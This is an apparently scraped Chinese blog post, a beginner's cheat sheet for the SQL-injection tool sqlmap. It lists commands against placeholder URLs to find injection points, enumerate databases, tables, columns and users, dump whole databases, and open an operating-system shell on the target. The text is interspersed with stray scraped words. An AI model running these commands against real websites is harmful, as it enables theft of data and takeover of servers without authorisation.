初涉sqlmap
一、基本注入(这个工具kali或者bt下面有集成的,这里附加一个window免py版,提取码:3ldv)php
sqlmap -u http://url/xx.php?id=1 判断注入sql
sqlmap -u http://url/xx.php?id=1 --dba 查找数据库shell
sqlmap -u http://url/xx.php?id=1 --tables -D 'db_name' 查找表数据库
sqlmap -u http://url/xx.php?id=1 --columns -T 'table_name' 查找列cookie
sqlmap -u http://url/xx.php?id=1 --dump -C 'column_name' 爆数据工具
sqlmap -u http://url/xx.php?id=1 --dump-all 脱裤(成功之后默认在bin/output目录下)post
二、进阶网站
sqlmap -u http://url/xx.php?id=1 --is-dba 判断是不是dba权限url
sqlmap -u http://url/xx.php?id=1 --users 查看用户blog
sqlmap -u http://url/xx.php?id=1 --privilege 判断权限
三、cookie注入
四、post注入
咱们须要先将post数据包抓取下来;保存到D:/post.txt
sqlmap -u http://url/xx.php -r D:/post.txt 进行注入
注:这个网址是验证输入的网址
五、shell(这个须要知道网站目录,而且magic_quotes_off必需为off状态)
sqlmap -u http://url/xx.php?id=1 --os-cmd=command
sqlmap -u http://url/xx.php?id=1 --sql-shell
而后能够执行sql语句
sqlmap -u http://url/xx.php?id=1 --os-shell 直接得到系统的shell
- 1. sqlmap初学
- 2. sqlmap初使用
- 3. vue-router初涉
- 4. OpenResty初涉
- 5. 初涉Locust
- 6. 初涉DVA
- 7. 初涉运营
- 8. 初涉密码
- 9. 初涉Webpack
- 10. 初涉WebGL
- 更多相关文章...
- • 数据库涉及到哪些技术? - MySQL教程
- • jQuery Mobile 页面事件 - jQuery Mobile 教程
- • 适用于PHP初学者的学习线路和建议
- • 漫谈MySQL的锁机制
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 「插件」Runner更新Pro版,帮助设计师远离996
- 2. 错误 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
- 3. Jenkins 2018 报告速览,Kubernetes使用率跃升235%!
- 4. TVI-Android技术篇之注解Annotation
- 5. android studio启动项目
- 6. Android的ADIL
- 7. Android卡顿的检测及优化方法汇总(线下+线上)
- 8. 登录注册的业务逻辑流程梳理
- 9. NDK(1)创建自己的C/C++文件
- 10. 小菜的系统框架界面设计-你的评估是我的决策
- 1. sqlmap初学
- 2. sqlmap初使用
- 3. vue-router初涉
- 4. OpenResty初涉
- 5. 初涉Locust
- 6. 初涉DVA
- 7. 初涉运营
- 8. 初涉密码
- 9. 初涉Webpack
- 10. 初涉WebGL